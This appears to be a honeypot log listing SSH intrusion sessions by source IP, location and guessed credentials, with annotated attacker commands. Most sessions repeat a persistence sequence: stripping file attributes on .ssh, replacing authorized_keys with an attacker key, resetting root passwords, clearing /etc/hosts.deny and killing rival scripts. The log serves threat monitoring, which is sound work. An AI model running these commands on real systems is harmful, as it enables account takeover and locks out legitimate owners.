$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 star_root_24 (72.240.125.133) β€” Maumee, United States Β· 1 session Β· 19 cmds
2026-05-31 10:54 EDT Β· as root/Dd123456
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:f1EfSTLNhPkj"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 panda_root_11 (115.151.72.155) β€” Taohua, China Β· 1 session Β· 19 cmds
2026-05-31 10:54 EDT Β· as root/123456!@#
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:1GigtGAn6dO9"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 baguette_root (217.181.205.168) β€” Paris, France Β· 4 sessions Β· 8 cmds
2026-05-31 09:01 EDT Β· as root/123456789, root/linux123
busybox β†’ ? (repeated busybox 4x)
$ /bin/busybox KIeIu1IA Γ—4
$ Γ—4
🎭 phantom_4 (217.160.226.51) β€” Madrid, Spain Β· 1 session Β· 20 cmds
2026-05-31 08:19 EDT Β· as remnux/malware
busybox β†’ ? (repeated busybox 4x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "malware\nvJywMK3TgUla\nvJywMK3TgUla"|passwd|bash
$ Enter new UNIX password:
$ echo "malware\nvJywMK3TgUla\nvJywMK3TgUla\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 panda_root_12 (171.111.218.2) β€” Liuchow, China Β· 1 session Β· 1 cmd
2026-05-31 06:43 EDT Β· as root/linux123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 specter_root_47 (181.0.214.136) β€” Villa MarΓ­a, Argentina Β· 3 sessions Β· 58 cmds
2026-05-13 08:06 EDT Β· as pavel/1234, root/ines123, root/mustang
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "1234\neOQvIxZpK6dh\neOQvIxZpK6dh"|passwd|bash
$ Enter new UNIX password:
$ echo "1234\neOQvIxZpK6dh\neOQvIxZpK6dh\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:KVnmIGjBSpqB"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ echo "root:jBaHMbm3NRKv"|chpasswd|bash
🎭 cipher_root_41 (128.199.231.249) β€” Singapore, Singapore Β· 2 sessions Β· 40 cmds
2026-05-31 05:41 EDT Β· as pavel/1234, sns/sns
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "sns\nGenh8PeRC3Ru\nGenh8PeRC3Ru"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "sns\nGenh8PeRC3Ru\nGenh8PeRC3Ru\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "1234\nAHl8z5obUNhi\nAHl8z5obUNhi"|passwd|bash
$ echo "1234\nAHl8z5obUNhi\nAHl8z5obUNhi\n"|passwd
🎭 ghost_root_54 (156.238.246.197) β€” Hong Kong, Hong Kong Β· 2 sessions Β· 40 cmds
2026-05-31 05:43 EDT Β· as pavel/1234, sns/sns
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "1234\nmOF5E0ykvs7P\nmOF5E0ykvs7P"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "1234\nmOF5E0ykvs7P\nmOF5E0ykvs7P\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "sns\no1Mihb5CpQbC\no1Mihb5CpQbC"|passwd|bash
$ echo "sns\no1Mihb5CpQbC\no1Mihb5CpQbC\n"|passwd
🎭 cipher_root_42 (187.212.47.18) β€” Puebla City, Mexico Β· 2 sessions Β· 39 cmds
2026-05-31 04:01 EDT Β· as root/root@1234, user01/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "123456\nfvXux3E7UnvN\nfvXux3E7UnvN"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nfvXux3E7UnvN\nfvXux3E7UnvN\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:JDjBHfZiFtgz"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 dragon_root_10 (14.103.117.142) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-05-31 04:00 EDT Β· as user01/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\n7CIxXtsDJkjJ\n7CIxXtsDJkjJ"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\n7CIxXtsDJkjJ\n7CIxXtsDJkjJ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_41 (147.50.103.212) β€” Phaya Thai, Thailand Β· 3 sessions Β· 40 cmds
2026-05-23 13:32 EDT Β· as omm/omm, root/20192019, root/Mx123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:2VYbckeSDfC2"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:5lX7Cx7XG90g"|chpasswd|bash
🎭 burger_root_29 (172.191.178.196) β€” Boydton, United States Β· 2 sessions Β· 38 cmds
2026-05-31 02:43 EDT Β· as root/20192019, root/Mx123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:eskfQgOJNAf9"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:zqOCdu0jB1F2"|chpasswd|bash
🎭 blitz_root_10 (82.115.25.70) β€” Nuremberg, Germany Β· 3 sessions Β· 58 cmds
2026-05-29 18:06 EDT Β· as info/info, root/Abc123456*, root/Mx123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:B004p24jhY47"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "info\nSaK1VY0tjER4\nSaK1VY0tjER4"|passwd|bash
$ Enter new UNIX password:
$ echo "info\nSaK1VY0tjER4\nSaK1VY0tjER4\n"|passwd
$ echo "root:GfFvM6OFZNvt"|chpasswd|bash
🎭 seoul_root_12 (211.106.137.135) β€” Songpa-gu, South Korea Β· 2 sessions Β· 21 cmds
2026-05-18 18:40 EDT Β· as root/Mx123456, root/fai
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:1M2ch69uM3kx"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 burger_root_30 (162.248.225.36) β€” Santa Clara, United States Β· 1 session Β· 19 cmds
2026-05-31 02:35 EDT Β· as root/Mx123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:cz5wgurHpwv9"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
